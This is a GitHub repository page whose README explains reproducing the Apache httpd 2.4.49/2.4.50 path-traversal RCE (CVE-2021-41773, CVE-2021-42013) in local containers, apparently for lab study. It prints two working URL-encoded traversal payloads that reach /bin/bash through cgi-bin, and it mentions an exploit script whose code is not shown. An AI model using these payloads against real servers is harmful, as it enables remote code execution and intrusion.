Skip to content

mightysai1997/cve-2021-41773-v-

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits

.gitignore

.gitignore

 
 

CVE-2021-41773.odp

CVE-2021-41773.odp

 
 

CVE-2021-42013.pdf

CVE-2021-42013.pdf

 
 

Dockerfile2449

Dockerfile2449

 
 

Dockerfile2450

Dockerfile2450

 
 

build.sh

build.sh

 
 

exploitation-sample.png

exploitation-sample.png

 
 

hello.pl

hello.pl

 
 

httpd.conf

httpd.conf

 
 

main.py

main.py

 
 

readme.md

readme.md

 
 

run.sh

run.sh

 
 

Repository files navigation

Apache httpd RCE

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside these directories are not protected by default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was incomplete, see CVE-2021-42013.​

Affected Version(s)

  • 2.4.49
  • 2.4.50

Fixed in Version(s)

  • 2.4.51

Prerequisities

  • podman (or alias podman as docker)
  • python3 and pip3
  • colorama (python library install with pip3 install colorama)

Files

  • httpd.conf the Default Apache configuration (with CGI module enabled)
  • hello.pl an example hello-world perl CGI script running in the container(s)
  • main.py an example exploit python script

Reproduction

Start a vulnerable Apache httpd (with default configuration) as docker/podman container.

Dockerfile Container Version
Dockerfile2449 vulnapache2449 2.4.49
Dockerfile2450 vulnapache2450 2.4.50
  1. Build both container images 1.1 chmod +x ./build.sh 1.2 ./build.sh
  2. Start vulnerable Apache httpd Containers 2.1 chmod +x ./run.sh 2.2 ./run.sh
  3. verify webserver is running 3.1 curl localhost:2449/cgi-bin/hello.pl 3.2 curl localhost:2450/cgi-bin/hello.pl
Container Listen Port
vulnapache2449 2449
vulnapache2450 2450
  1. run the exploit script 1.1 python3 main.py localhost:4249 1.2 select attack on version 2.4.49 1.3 python3 main.py localhost:2450 1.4 select attack on version 2.4.50

Exploitation Example

Explanation

The Exploit will utilize Apache httpds CGI module to allow execution of arbitrary executables through path traversal.

  • /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
  • /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash

.%2e/ is url-encoded and equals to ../ if decoded. .%%32%658 is double url-encoded and equals also to ../ if decoded.

Credits

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages